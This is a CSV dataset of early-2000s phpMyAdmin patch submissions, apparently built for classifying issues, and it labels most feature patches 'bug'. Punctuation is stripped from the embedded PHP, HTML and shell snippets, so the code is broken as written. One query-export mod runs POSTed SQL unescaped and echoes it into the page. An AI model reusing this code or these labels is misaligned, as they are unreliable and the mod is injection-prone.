"24444","4078","Initial DB list for MySQL amp;gt; 4.0.2. phpMyAdmin 2.3.3 relies on the MySQL variable safe show databases to determine whether it can safely obtain a list of databases for a user.
This has been superseded in MySQL 4 by the SHOW DATABASES privilege, with the restrictions of safe show databases now the default.
The patch assumes that SHOW DATABASES is safe for MySQL amp;gt;= 4.0.2; if it s not, that s because the DBM has chosen to make it so.
Patch modified Changelog and libraries common.lib.php Original URL https sourceforge.net p phpmyadmin patches 134 https sourceforge.net p phpmyadmin patches 134 Original author charles bailey","bug"
"24444","4079","Multiple patches Query time, JS Query window, MIME types).
[Work in Prorgess] My first diff of my todo list.
Most work is done, remains bugfixing and especially to seperate my huge diff into parts.
I won t have much time the next two weeks because I take some time off, so I can t say when I will that.
Maybe someone wants to test the whole patches at once for now.
It s diffed against latest CVS 2002 02 06).
Maybe there are some debug messages slipped through, but I tried to clean them up anywhere.
Here s my Changelog, I hope that will suffice Update and display column comments in Add Edit Fieldmode and CREATE table mode.
Display comments in table structure optional) with underlined CSS mouseovers.
Display comments in browser mode optional), both in vertical and horizontal display mode.
Files tbl addfield.php3, tbl alter.php3, tbl create.php3, tbl properties.inc.php3, tbl properties structure.php3, tbl relation.php3 Variables cfg[ ShowBrowseComments ], cfg [ ShowPropertyComments ] Language Variables NONE TODO Won t work if multiple tables are used in a query.
I guess.
Haven t checked this out yet Display column comments in table database dumps, as inline SQL Comments Files tbl dump.php3, tbl properties export.php3, build dump.lib.php3 Variables NONE Language Variables strDumpComments Keep column comments in synch, when DROPping ALTERing and moving copying tables Files db details links.php3, db details structure.php3, sql.php3, relation.lib.php3, tbl alter.php3, tbl move copy.php3, tbl properties links.php3, tbl rename.php3 Variables NONE Language Variables NONE Measures basic query time [ 571934] Files sql.php3, display tbl.lib.php3 Variables NONE Language Variables strQueryTime JS rowmarker now works in vertical display mode Files libraries functions.js, display tbl.lib.php3 Variables NONE Language Variables NONE New display mode with 90 degree rotated table headers [ 544361].
Works either as CSS or as faked PHP transformation.
Files libraries common.lib.php3, libraries display tbl.lib.php3 Variables cfg[ DefaultDisplay ], cfg[ HeaderFlipType ], Language Variables strRowsModeFlippedHorizontal Display nav bar even when only one row is returned, to enable display in vertical horizontal mode Files libraries display tbl.lib.php3 Variables NONE Language Variables NONE Display and enter DB comments for navigation, stored in pma comments table [ 650064] Files db details structure.php3, left.php3, relation.lib.php3 Variables cfg[ ShowTooltipAliasDB ], cfg [ ShowTooltipAliasTB ] Language Variables strDBComment Display a javascript) based query window as a new frame below the left frame with query history [ 526008] Files queryframe.php3, querywindow.php3, header.inc.php3, tbl query box.php3, common.lib.php3 Variables cfg[ QueryFrame ], cfg[ QueryFrameJS ], cfg[ QueryFrameDebug ], cfg[ QueryWindowWidth ], cfg[ QueryWindowHeight ] Language Variables strQueryFrame, strQueryFrameDebug, strQueryFrameDebugBox, strQuerySQLHistory Display MIME types to transform any table cell.
You can only choose from a list of pre defined MIME types.
The list gets built by a function searching a directory for valid transforms.
They shall all be named basetype subtype transform.inc.php .
Files tbl properties.inc.php3, transformations.lib.php3, relation.lib.php3, create tables.sql, tbl addfield.php3, tbl alter.php3, tbl create.php3, tbl move copy.php3, transformation wrapper.php3, libraries display tbl.lib.php3, libraries transformations Variables cfg[ BrowseMIME ] Language Variables strMIME MIMEtype, strMIME transformation, strMIME transformation options, strMIME transformation options note, strMIME transformation note, strMIME available mime, strMIME without, strMIME available transform, strMIME description, strMIME file, str transformation , strMIME nodescription TODO Won t work if multiple tables are used in a query.
I guess.
Haven t checked this out yet Complete Todo Debugging works for me, but haven t checked through that many cases), Check what happens with my patches if multiple tables dbs are involved, Write basic transformations for mimetypes, Documentation.
Maybe display MIME Types in PDF Pages and Printview and Export.
Original URL https sourceforge.net p phpmyadmin patches 135 https sourceforge.net p phpmyadmin patches 135 Original author garvinhicking","bug"
"24444","4080","add innodb status capability.
This allows you to add the ability to see innodb status reports which is very helpful in solving transaction lock outs.
It does not test for version of mysql to see if you have innodb capabitilites.
To make this work save the attachment in the phpMyAdmin directory naming it amp;quot;db innodbstat.php amp;quot; Also you need to add this patch to main.php created using diff if you are unfamiliar with diff simply add the 7 lines each starting with amp;lt; to main.php starting at line 410 but do not include the amp;lt; at the start of each line.
Supposedly you can use patch to put this in but I m not fully understanding patch so I ll leave that to the pros) 410,416d409 amp;lt; amp;lt;tr amp;gt; amp;lt; amp;lt;td valign= amp;quot;baseline amp;quot; amp;gt; amp;lt;img src= amp;quot; amp;lt;?php echo item img; ?
amp;gt; amp;quot; width= amp;quot;7 amp;quot; height= amp;quot;7 amp;quot; alt= amp;quot;item amp;quot; amp;gt; amp;lt; td amp;gt; amp;lt; amp;lt;td amp;gt; amp;lt; amp;lt;a href= amp;quot;db innodbstat.php?
amp;lt;?php echo common url query; ?
amp;gt; amp;quot; amp;gt; amp;lt; amp;lt;?php echo strInnodbStat; ?
amp;gt; amp;lt; a amp;gt; amp;lt; amp;lt; td amp;gt; amp;lt; amp;lt; tr amp;gt; You will also need to add strInnodbStat = Innodb Status ; to each line of the language include files found in the amp;quot;lang amp;quot; directory.
There is a program there in the lang directory to help with this add message.sh in where you d simple from a command line type .
add message.sh strInnodbStat InnoDB Status only if your files are .php extension not .php3) first edit the add message.sh script to reflect this as it has .inc.php3 inside of it and will look for .php3 files unless you change this) Original URL https sourceforge.net p phpmyadmin patches 136 https sourceforge.net p phpmyadmin patches 136 Original author jjcarlson","bug"
"24444","4081","2.4.1 dev) Left pane one click to the table.
I have in my db many tables, I was spending lot of time to find the table in the left pane, so I changed the left pane, and now the table are put in a select area so I can type only one letter on my keyboard and I found straight away the table whose the name starts with the key I pressed.
Look at the file, adapted from v2.4.0 rc1 Original URL https sourceforge.net p phpmyadmin patches 137 https sourceforge.net p phpmyadmin patches 137 Original author mdelorme","bug"
"24444","4082","pdf landscape.
on line 1362 and 1361 in pdf schema, change 100 by 112 to have a good aligment of the tables Original URL https sourceforge.net p phpmyadmin patches 138 https sourceforge.net p phpmyadmin patches 138 Original author mdelorme","bug"
"24444","4083","parser for COUNT problems.
Try this on current cvs.
Original URL https sourceforge.net p phpmyadmin patches 139 https sourceforge.net p phpmyadmin patches 139 Original author lem9","bug"
"24444","4084","2.4.1 dev) Several tests of equality like ===.
Tested on PHP 3.0.18 platform Debian 3.0) Found several tests of equality like === in code that produce PHP parse errors.
Particularly in .
libraries sqlparser.lib.php, .
libraries xpath XPath.clas s.php and .
tbl dump.php files.
See below the result of find command .
tbl dump.php 385 if dump buffer === 8) \{ .
libraries sqlparser.lib.php 315 pos === FALSE) .
libraries sqlparser.lib.php 610 if strpos whatWeWant, typeSeperator) === FALSE) \{ .
libraries xpath XPath.class.php 425 if levelOfVerbosity === TRUE) \{ .
libraries xpath XPath.class.php 427 \} elseif levelOfVerbosity === FALSE) \{ .
libraries xpath XPath.class.php 2469 if strpos term, separator)===FALSE) \{ no separator found so end now .
libraries xpath XPath.class.php 2480 if tmp1===FALSE) \{ .
libraries xpath XPath.class.php 2482 \} elseif tmp2===FALSE) \{ .
libraries xpath XPath.class.php 2981 if predicate === ) \{ .
libraries xpath XPath.class.php 3029 if strpos predicate, operator)===FALSE) continue; .
libraries xpath XPath.class.php 4196 if second=== ) return TRUE; .
libraries xpath XPath.class.php 4199 if strpos first, second) === FALSE) \{ .
libraries xpath XPath.class.php 4925 if pos===FALSE) \{ f Original URL https sourceforge.net p phpmyadmin patches 140 https sourceforge.net p phpmyadmin patches 140 Original author rnr2k3","bug"
"24444","4085","2.4.1 dev) Style Sheet updates.
These updates condense some style sheets to allow for faster download times increase compatibility with ns4 by modifying style sheets fixes the xc2x93menu barxc2x94 or xc2x93tabs barxc2x94 to display properly on more screen resolutions.
Brendan Original URL https sourceforge.net p phpmyadmin patches 141 https sourceforge.net p phpmyadmin patches 141 Original author knightt","bug"
"24444","4086","2.4.1 dev) inline thumbnails.
This generates correctly resize thumbnails of jpegs.
mimetype image jpeg browser transformation image jpeg inline transformation options here, set only one value, for example 75.
We do not set width and height because the resize respects the original ratio width height, so the option is an indication of the approximate size we want.
The merged patch will modify strTransformation image jpeg inline to explain the option.
Also, the thumbnails are clickable to display the original image.
Original URL https sourceforge.net p phpmyadmin patches 142 https sourceforge.net p phpmyadmin patches 142 Original author lem9","bug"
"24444","4087","Problem with associative non associative arrays.
A bug report was today sent in german language.
Basically the report said, that if you add a table containing numerical indices CREATE TABLE buggy 1 varchar 12) NOT NULL default , 2 varchar 12) NOT NULL default , 3 varchar 12) NOT NULL default , 4 varchar 12) NOT NULL default , 5 varchar 12) NOT NULL default , six varchar 23) NOT NULL default , 7 varchar 23) NOT NULL default ) TYPE=MyISAM; and you call tbl change.php3 you will have wrong lined up displays.
The first item will hold the data from the second, and so forth.
This is because the row table def[ Field ] contains the value 1 for the first field and accesses row[1] which of course is wrong because it should refer to the field row[0], because mysql fetch array returned data overwriting the new associative value with the next non associative key.
I made a quick bugfix which will detect, if row table def [ Field ] is an integer BTW, is int ) did not work here, I had to use a RegEx).
row[ field] has now to be accessed with the real pointer to the data.
To maintain referals to the true header in the display, all calls to field are maintained, because otherwise the table would ve looked like this 0 1 1 2 2 3 3 4 4 5 six 6 6 7 So I only renamed the row[] pointer.
I do not know if this fixes all issues, I am not that deep into the code.
I ll have another look at it, and maybe you want to try out the patch as well.
Regards, Garvin.
Original URL https sourceforge.net p phpmyadmin patches 143 https sourceforge.net p phpmyadmin patches 143 Original author garvinhicking","bug"
"24444","4088","Single CSS.
Hi!
I made an approach to combine all stylesheets into one file, to make future XHTML strict issues easier.
So one amp;lt;link rel amp;gt; call is now sufficient to include all stylesheets.
Brendan also tried on this, but his approach did not work for me in first place.
Rabus helped me on this and we could verify its function with IE6 and current Mozilla.
Next step would be to condense some stylesheets into one.
Then we could sometime try to remove all style= calls and remove align valign tags to replace them with corresponding CSS classes.
Then we should be really flexible with personal stylesheets.
Feel free to comment. )
Regards, Garvin.
Original URL https sourceforge.net p phpmyadmin patches 144 https sourceforge.net p phpmyadmin patches 144 Original author garvinhicking","bug"
"24444","4089","2.4.1 dev) Workaround for header ) redirects needed.
Please see bug 697979!
This is a preliminary fix, but we should try to do some nicer redirection...
Original URL https sourceforge.net p phpmyadmin patches 145 https sourceforge.net p phpmyadmin patches 145 Original author garvinhicking","bug"
"24444","4090","listbox navigation.
Une toute petite modification 2 fichiers) qui permet d afficher un listbox de redirection vers une autre page dans la barre de navigation des rxc3xa9sultats d une requxc4x8dte.
Le fichier zip comporte une capture d xc3xa9cran plus parlante.
2 fichiers ont xc3xa9txc3xa9 modifixc3xa9s amp;quot;librairies functions.js amp;quot;, amp;quot;librairies display tbl.lib.php amp;quot;.
Les modifs ont xc3xa9txc3xa9 entourxc3xa9es par =============================== ===== SOUMISSION UPDATE ======= =============================== .)
=============================== ==== SOUMISSION UPDATE ====== =============================== pour xc4x99tre repxc3xa9rxc3xa9es facilement.
Alexis Original URL https sourceforge.net p phpmyadmin patches 146 https sourceforge.net p phpmyadmin patches 146 Original author alexis soulard","bug"
"24444","4091","http Authenticate and Deerfield Website Personal Server.
With Deerfield Website Personal Webserver 3.1) the http authentication doesn t function it asks for user pw several times and always deny access) f course with globals = off in php.ini).
I ve modified the fix from Matthias Fichtner and now this code is like the following Fix from Matthias Fichtner for WebSite Professional Part 1 else if isset AUTH USER)) \{ SERVER[ PHP AUTH USER ] = AUTH USER; PHP AUTH USER = AUTH USER; \} else if !empty ENV) amp;amp; amp;amp; isset ENV [ AUTH USER ])) \{ SERVER[ PHP AUTH USER ] = ENV [ AUTH USER ]; PHP AUTH USER = ENV [ AUTH USER ]; \} else if !empty HTTP ENV VARS) amp;amp; amp;amp; isset HTTP ENV VARS[ AUTH USER ])) \{ SERVER[ PHP AUTH USER ] = HTTP ENV VARS[ AUTH USER ]; PHP AUTH USER = HTTP ENV VARS [ AUTH USER ]; \} else if getenv AUTH USER )) \{ SERVER[ PHP AUTH USER ] = getenv AUTH USER ); PHP AUTH USER = getenv AUTH USER ); \} Fix from Matthias Fichtner for WebSite Professional Part 2 else if isset AUTH PASSWORD)) \{ SERVER[ PHP AUTH PW ] = AUTH PASSWORD; PHP AUTH PW = AUTH PASSWORD; \} else if !empty ENV) amp;amp; amp;amp; isset ENV [ AUTH PASSWORD ])) \{ SERVER[ PHP AUTH PW ] = ENV [ AUTH PASSWORD ]; PHP AUTH PW = ENV [ AUTH PASSWORD ]; \} else if !empty HTTP ENV VARS) amp;amp; amp;amp; isset HTTP ENV VARS[ AUTH PASSWORD ])) \{ SERVER[ PHP AUTH PW ] = HTTP ENV VARS[ AUTH PASSWORD ]; PHP AUTH PW = HTTP ENV VARS [ AUTH PASSWORD ]; \} else if getenv AUTH PASSWORD )) \{ SERVER[ PHP AUTH PW ] = getenv AUTH PASSWORD ); PHP AUTH PW = getenv AUTH PASSWORD ); \} The basic change is the use of SERVER[ PHP AUTH PW ] and SERVER[ PHP AUTH USER ] webmaster espaciolatino.com Original URL https sourceforge.net p phpmyadmin patches 147 https sourceforge.net p phpmyadmin patches 147 Original author anonymous","bug"
"24444","4092","session after 2.5.0) md5 cookie auth method non SSL).
The attached files are an update to the cookie authentication method so that the password can be sent as a hash over the internet, useful over non SSL connections.
The method I use on my site uses a random session variable which is sent with the form CHAP login method) as to prevent a replay attack eavesdropping).
Before the form is sent, the random session variable and the entered password values are changes md5 hashes and then sent.
The received hash values are matched against the md5 hashes of the random session variable and the md5 hash of the password entered in the config under the matched username in the config.
If matched, the password entered in the config is used to validate the mysql login.
Thoughts, suggestions?
Paul Johe Note the attached md5 javascript library was written by Paul Johnston and can be found http pajhome.org.uk crypt md5 ) Original URL https sourceforge.net p phpmyadmin patches 148 https sourceforge.net p phpmyadmin patches 148 Original author pdjohe","bug"
"24444","4093","Insert multiple field into manual SQL query.
Lors d une requxc4x8dte SQL tapxc3xa9e xc5x95 la main ce patch permet d insxc3xa9rer un ou plusieur s) champ s) de la table dans la requxc4x8dte javascript amxc3xa9liorxc3xa9 de la version dxc3xa9jxc5x95 existante).
Les champs sxc3xa9lectionnxc3xa9s sont insxc3xa9rxc3xa9s xc5x95 la position du curseur testxc3xa9 sous IE6, Mozilla 1.2.1, pour les navigateurs non compatibles les champs sont insxc3xa9rxc3xa9s en fin de formulaire, comme c xc3xa9tait le cas avant).
La dxc3xa9mo est disponible ici http www.alexphpteam.com phpmyadmin patchs patch 1.htm 2 fichiers ont xc3xa9txc3xa9 modifixc3xa9s amp;quot;tbl query box.php3 amp;quot; v 1.22 2003 03 12 18 05 38 garvinhicking Exp) modifs en lignes 100, 109 et 115, amp;quot;librairies functions.js amp;quot; v 1.33 2003 03 17 14 34 41 lem9 Exp) modifs xc5x95 partir de la ligne 646 Original URL https sourceforge.net p phpmyadmin patches 149 https sourceforge.net p phpmyadmin patches 149 Original author alexis soulard","bug"
"24444","4094","InnoDB to PMA relation.
This was posted on the Open Discussion forum by ehershey.
The idea is interesting, however we should implement it in PHP.
Please note also that we should still discuss if it s better to import the foreign keys in PMA relation, or if we should work directly with true foreign keys if we can maintain all current PMA functionnality with them).
!
bin sh inno2pma insert InnoDB foreign keys into phpmyadmin relation table by Ernie Hershey 3 15 2003 requires mysql client tools standard unix shell tools special PHPMyAdmin relation table setup config database= amp;quot;triohost2 amp;quot; table= amp;quot;domains amp;quot; relationdb= amp;quot;phpmyadmin amp;quot; relationtable= amp;quot;PMA relation amp;quot; end config mysqldump no data database table | egrep amp;quot; CREATE| FOREIGN amp;quot;| while read line do line=`echo amp;quot; line amp;quot;|sed s g ` first token=`echo amp;quot; line amp;quot; | cut f1 d amp;quot; amp;quot;` case first token in CREATE) table name=`echo amp;quot; line amp;quot;|sed s CREATE TABLE \ .
\) \1 ` echo amp;quot;DELETE FROM relationtable WHERE master db= database AND master table= table name amp;quot; | mysql relationdb ;; FOREIGN) localcolumn=`echo amp;quot; line amp;quot; | cut f2 d\\\`` foreigntablefull=`echo amp;quot; line amp;quot; | cut f4 d\\\`` foreigndb=`echo foreigntablefull | cut f1 d.` foreigntable=`echo foreigntablefull | cut f2 d.` foreigncolumn=`echo amp;quot; line amp;quot; | cut f6 d\\\`` echo processing foreign key on column database.
table name.
localcolumn to foreigndb.
foreigntable.
foreigncolumn amp;gt; amp;amp;2 echo amp;quot;INSERT INTO relationtable VALUES database , table name , localcolumn , foreigndb , foreigntable , foreigncolumn ); amp;quot; | mysql relationdb ;; esac done Original URL https sourceforge.net p phpmyadmin patches 150 https sourceforge.net p phpmyadmin patches 150 Original author lem9","bug"
"24444","4095","Change memory limit.
We got a suggestion from nicola.asuni galactica.it on the config.inc.php put a line like ini set amp;quot;memory limit amp;quot;, amp;quot;256M amp;quot;); Naturally, instead of 256M you can use a configuration constant user choice).
This will avoid problems when you try to export or import large tables.
Comments works only in PHP 4 I tried it in safe mode and just after, I tried a ini get and as expected, the ini set did not work.
we should test it to be sure it has the expected effect.
Some ini set ) don t work because it s too late in the initialization phase of PHP.
of course, a big value on a non safe mode server) will consume much memory.
Original URL https sourceforge.net p phpmyadmin patches 151 https sourceforge.net p phpmyadmin patches 151 Original author lem9","bug"
"24444","4096","RFE 724749 Nested Tables).
See RFE 724749 Files from CVS 2003 04 22 Original URL https sourceforge.net p phpmyadmin patches 152 https sourceforge.net p phpmyadmin patches 152 Original author garvinhicking","bug"
"24444","4097","RFE 718942 LaTeX export improvements.
Here it comes, improved LaTeX export for phpMyAdmin.
Any comments welcome ) Also implements RFE 718942 Michal Original URL https sourceforge.net p phpmyadmin patches 153 https sourceforge.net p phpmyadmin patches 153 Original author nijel","bug"
"24444","4098","RFE 728833 Multi statement query res..
Attached patch displays result of last query from multiple queries if it is SELECT.
Made as fix for RFE 728833.
Please test.
Original URL https sourceforge.net p phpmyadmin patches 154 https sourceforge.net p phpmyadmin patches 154 Original author nijel","bug"
"24444","4099","relations arrows above tables.
this message follow the bug 728789 and 624712 I give you the php3 flavour, of my file the auto intrabute was introduce by me, I m the conceptor of this class), As you can see at the end of the actual CVS file this first attribute was always set on auto , so that s not a parameter... this file is up to date according the version 1.5 of the CVS repository Original URL https sourceforge.net p phpmyadmin patches 157 https sourceforge.net p phpmyadmin patches 157 Original author mdelorme","bug"
"24444","4100","Support for iconv parameters.
Add support for specifying iconv parameters in config file eg.
amp;quot; IGNORE TRANSLIT amp;quot;).
Initially requested in forum https sourceforge.net forum forum.php?thread id=857541 amp;amp;forum id=72909, see http www.gnu.org software libiconv documentation libiconv iconv open.3.html for more info on these parameters.
Original URL https sourceforge.net p phpmyadmin patches 155 https sourceforge.net p phpmyadmin patches 155 Original author nijel","enhancement"
"24444","4101","Export of CSV Files.
There is a known bug in the csv export.
I needed this and tried to find a workaround and this is what I made on my machine.
Replace the CSV Part in amp;quot;tbl dump.php amp;quot; with csv case else \{ Handles the EOL character if GLOBALS[ what ] == excel ) \{ add character = amp;quot;\015\012 amp;quot;; \} else if empty add character)) \{ add character = GLOBALS[ crlf ]; \} else \{ add character = str replace \\r , amp;quot;\015 amp;quot;, add character); add character = str replace \\n , amp;quot;\012 amp;quot;, add character); add character = str replace \\t , amp;quot;\011 amp;quot;, add character); \} end if i = 0; if isset table select)) \{ tmp select = implode table select, | ); tmp select = | .
tmp select .
| ; \} while i amp;lt; num tables) \{ if !isset single)) \{ table = PMA mysql tablename tables, i); \} if !isset limit from) || !isset limit to)) \{ limit from = limit to = 0; \} if isset tmp select) amp;amp; amp;amp; strpos .
tmp select, | .
table .
| )) \{ tmp buffer = ; PMA getTableCsv db, table, limit from, limit to, separator, enclosed, escaped, PMA myCsvHandler , err url , isset sql query)?urldecode sql query) )); dump buffer .= tmp buffer; i ; \} else \{ i ; \} \} \} end csv case If you donxc2xb4t want to modify it on your own, try the attached tbl dump.php of mine.
PLEASE MAKE COPY OF THE OLD ONE !!!
Have Fun !
Original URL https sourceforge.net p phpmyadmin patches 156 https sourceforge.net p phpmyadmin patches 156 Original author anonymous","bug"
"24444","4102","Sort table or database in natural order.
Enable users to choose an option either to use default sorting order or using natural sorting order.
Original URL https sourceforge.net p phpmyadmin patches 159 https sourceforge.net p phpmyadmin patches 159 Original author hoojx","bug"
"24444","4103","New frameset generation.
Hi All!
Please check my patch to see if this works better in Opera6 and Konqueror related browsers.
Regards, Garvin.
Original URL https sourceforge.net p phpmyadmin patches 158 https sourceforge.net p phpmyadmin patches 158 Original author garvinhicking","bug"
"24444","4104","zip.lib.php upgrade ability to add directory.
Since you ve got a very useful script, which allows to pack any data to a .zip file, it seems to be a great idea to allow users of this script to pack a bunch of files at once.
Original URL https sourceforge.net p phpmyadmin patches 160 https sourceforge.net p phpmyadmin patches 160 Original author techtonik","enhancement"
"24444","4105","Export rework.
Here is first working version of export rework.
Highlights support for exporting selected databases now you can eg.
export all databases into one huge CSV file, really useful feature, but it was no work to implement it )) if not needed buffering, output is send directly unifies all export, so there is now more common code sql export can contain relations and mime types in comments Original URL https sourceforge.net p phpmyadmin patches 161 https sourceforge.net p phpmyadmin patches 161 Original author nijel","bug"
"24444","4106","Bug 749365 Safari breaks on lt;legend gt; tags.
Ref http developer.apple.com internet safari faq.html This patch modifies libraries display export.lib.php3, which was the only file I identified as using amp;lt;legend amp;gt; amp;lt; legend amp;gt; tags.
It adds code to check the USER AGENT variable, and if it matches the Safari string listed at the ref.
above, the amp;lt;legend amp;gt; tags are not printed.
THIS PATCH HAS NOT BEEN TESTED.
While I think it will work, I have not installed it on a system and actually run it.
Please feel free to use this as an idea, or actually install it and see if it works ok as is.
This patch is related to Bug 749365.
Original URL https sourceforge.net p phpmyadmin patches 162 https sourceforge.net p phpmyadmin patches 162 Original author dhagan","bug"
"24444","4107","PDF DHTML editing positioning control.
Here s a DHTML IE5 Mozilla compatible) control to easily WYSIWYG control the positioning of PDF elements.
See patched Documentation.html for the notes.
Original URL https sourceforge.net p phpmyadmin patches 163 https sourceforge.net p phpmyadmin patches 163 Original author garvinhicking","bug"
"24444","4108","Password encoding with blowfish.
To test, put this in libraries auth.
Please comment.
Those functions would go in cookie.auth.lib, to encode decode the password to from the cookies.
Original URL https sourceforge.net p phpmyadmin patches 164 https sourceforge.net p phpmyadmin patches 164 Original author lem9","bug"
"24444","4109","Export a Query.
Hey List, In PMA 2.3.3 there is no way to export a given query, only a way to export the whole table.
I found this a bit inconvenient, so I wrote a little mod to add this capability.
The zip file with the Modified files and documentation is attached.
The documentation is as follows QUERY EXPORT MOD Written By Justin M. Fiore 2003 07 18 PURPOSE Adds ability to export a certain query instead of the whole table.
MOD CREATED FOR PHPMyAdmin version 2.3.3 All Line numbers are based off VIRGIN SCRIPTS, meaning that you nor anyone else has modified them.
That the lines are as they were when they were downloaded and extracted.
DISCLAIMER This is not supported in any way shape or form.
I made this, so I am sharing it.
If you need help you can e mail me though, jmf10024 yahoo.com and I will try to find time to help you.
INSTALLATION 2 methods 1\.
If you have the zip file with the php files you can copy my files to the proper locations in your directory structure 2\.
You can use the INSTRUCTIONS ON MODIFYING YOUR CODE see below) to make the changes yourself.
INSTRUCTIONS ON MODIFYING YOUR CODE replace amp;quot;PMA displayTable result, disp mode, analyzed sql); amp;quot; with amp;quot; export goto = tbl properties export.php .
?lang= .
lang .
amp;amp;amp;convcharset= .
convcharset .
amp;amp;amp;server= .
server .
amp;amp;amp;db= .
urlencode db) .
amp;amp;amp;table= .
urlencode table) .
amp;amp;amp;pos= .
pos .
amp;amp;amp;session max rows= .
session max rows .
amp;amp;amp;disp direction= .
disp direction .
amp;amp;amp;repeat cells= .
repeat cells .
amp;amp;amp;dontlimitchars= .
dontlimitchars .
amp;amp;amp;sql query= .
urlencode sql query); ?
amp;gt; amp;lt;form action= amp;quot; amp;lt;?php print export goto;?
amp;gt; amp;quot; method= amp;quot;post amp;quot; amp;gt; amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;dump query amp;quot; value= amp;quot; amp;lt;?php print sql query;?
amp;gt; amp;quot; amp;gt; amp;lt;input type= amp;quot;submit amp;quot; name= amp;quot;q export amp;quot; value= amp;quot;EXPORT ALL amp;lt;?php print unlim num rows;?
amp;gt; ROWS amp;quot; amp;gt; amp;lt; form amp;gt; amp;lt;?php PMA displayTable result, disp mode, analyzed sql); ?
amp;gt; amp;lt;form action= amp;quot; amp;lt;?php print export goto;?
amp;gt; amp;quot; method= amp;quot;post amp;quot; amp;gt; amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;dump query amp;quot; value= amp;quot; amp;lt;?php print sql query;?
amp;gt; amp;quot; amp;gt; amp;lt;input type= amp;quot;submit amp;quot; name= amp;quot;q export amp;quot; value= amp;quot;EXPORT ALL amp;lt;?php print unlim num rows;?
amp;gt; ROWS amp;quot; amp;gt; amp;lt; form amp;gt; amp;lt;?php amp;quot; on line 504 of .
sql.php add amp;quot; amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;dump query amp;quot; value= amp;quot; amp;lt;?php print dump query?
amp;gt; amp;quot; amp;gt; amp;quot; to .
tbl properties export.php around line 32 add amp;quot; amp;lt;?php if dump query!= ) \{ print amp;quot; amp;lt;br amp;gt; amp;lt;br amp;gt;DUMP FOR QUERY dump query amp;quot;; \} ?
amp;gt; amp;quot; to .
tbl properties export.php around line 17 Possibly comment out line 290 in .
tbl dump.php replace amp;quot; local query = SELECT FROM .
PMA backquote db) .
.
.
PMA backquote table) .
add query; amp;quot; with amp;quot;global dump query; global db; if dump query!= ) \{ local query = dump query; mysql select db db); \} else local query = SELECT FROM .
PMA backquote db) .
.
.
PMA backquote table) .
add query; amp;quot; on lines 200, 542, and 628 in .
libraries build dump.lib.php UPLOAD THE SCRIPTS AND TRY IT OUT DONE.
End Documentation Original URL https sourceforge.net p phpmyadmin patches 165 https sourceforge.net p phpmyadmin patches 165 Original author jfiore","bug"
"24444","4110","Improved Latex export.
While using phpMyAdmin to automatically generate documentation on my databases, I added the following improvements to the Latex export module libraries export latex.php) The table environment is removed, because otherwise the longtable is terminated anyway at the end of a page.
Only the longtable environment is required.
Table captions are included in the form amp;quot;table x Table amp;lt;tablename amp;gt; amp;quot; and amp;quot;table x Table amp;lt;tablename amp;gt; continued) amp;quot; if the table spans multiple pages.
This makes it easy to recognize the name of the table, since previously the name of the table wasn t included in the output.
A label for each table is also exported in the form amp;quot;\label\{tab table amp;lt;tablename amp;gt;\} amp;quot;.
This is easy when refering to the table in a text.
Changed the format of the links to field to amp;lt;tablename amp;gt; amp;lt;field amp;gt;) , since the greater than sign is a special character in Latex.
See also bug 776957 http sourceforge.net tracker index.php?func=detail amp;amp;aid=776957 amp;amp;group id=23067 amp;amp;atid=377408 Fields that are part of the primary key of a table are highlighted in italic.
Column headings are still centered, but the other rows can have alternative alignment for example left for the field names).
The changes are limited to the structure part of the script.
No changes on the data exporting part are done.
The patch file attached is against version 1.2 of latex.php, as shipped with phpMyAdmin 2.5.2.
Original URL https sourceforge.net p phpmyadmin patches 166 https sourceforge.net p phpmyadmin patches 166 Original author hinayani","bug"
"24444","4111","Relational insert More than 200 entries.
In reply to RFE 762221 Here s a patch doing the things lem9 and me worked out.
Please test. )
Original URL https sourceforge.net p phpmyadmin patches 167 https sourceforge.net p phpmyadmin patches 167 Original author garvinhicking","bug"
"24444","4112","Don t list databases the user don t have access to.
After I upgraded to MySQL 4 the select list containing the databases now contains all databases on the MySQL server, not only the database the current user has access to, which was the case with MySQL 3.
Seems like mysql select db ) returns true as long as the database exist, not only if the user has privileges to access it according to the amp;quot;mysql.db amp;quot; table.
So, I added a new function, PMA verify access ) to common.lib.php and used that function instead of PMA mysql select db in PMA availableDatabases ).
Don t know if listing all databases is expected behaviour or not, I just found it annoying since I have a good amount of databases available, but only have access to one of them when I m logged in as anything else than root ;) Original URL https sourceforge.net p phpmyadmin patches 168 https sourceforge.net p phpmyadmin patches 168 Original author dufuz","bug"
"24444","4113","UI support for two MySQL servers on localhost.
Vess Consulting s development systems include both a locally hosted MySQL server using sockets named pipes) , and SSH tunnels obviously TCP) to remote MySQL servers.
PMA s UI shows multiple servers in a drop down list, but the text in the list is identical for each server.
We ve changed the text copy to display the database username that PMA will use, the connection type UNIX socket named pipe tcp) and the corresponding name or port.
For example, a locally hosted MySQL server using a named pipe on the default settings shows as localhost root) using socket on amp;quot; amp;quot; while the tunnelled connection to a remote MySQL server mapping to the default MySQL port 3306) displays as localhost root) using tcp on amp;quot;default amp;quot; This compares with the current display listing showing only amp;quot;localhost amp;quot; repeated twice.
I ve attached a unified diff patch for main.php.
P.S.
Excellent work PMA team!
phpmyadmin main.php patch to enhance UI for multiple MySQL servers Copyright C) 2003 Vess Consulting This code is free software; you can redistribute it and or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or at your option) any later version.
This code is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along with this code; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111 1307 USA Original URL https sourceforge.net p phpmyadmin patches 169 https sourceforge.net p phpmyadmin patches 169 Original author vess consulting","bug"
"24444","4114","for 2.5.4) ON DELETE, ON UPDATE.
for Relation view) Please comment on the interface.
I would be glad to know how to reduce the fonts in the drop downs.
Note the drop downs will do something in the next version of this patch ) Original URL https sourceforge.net p phpmyadmin patches 170 https sourceforge.net p phpmyadmin patches 170 Original author lem9","bug"
"24444","4115","Memory limit zlib.lib.
that line new offset = strlen implode , this amp;gt;datasec)); in file zlib.lib.php causes sometimes to exceed memory limit and also takes unneccesary time to process when exporting large databases.
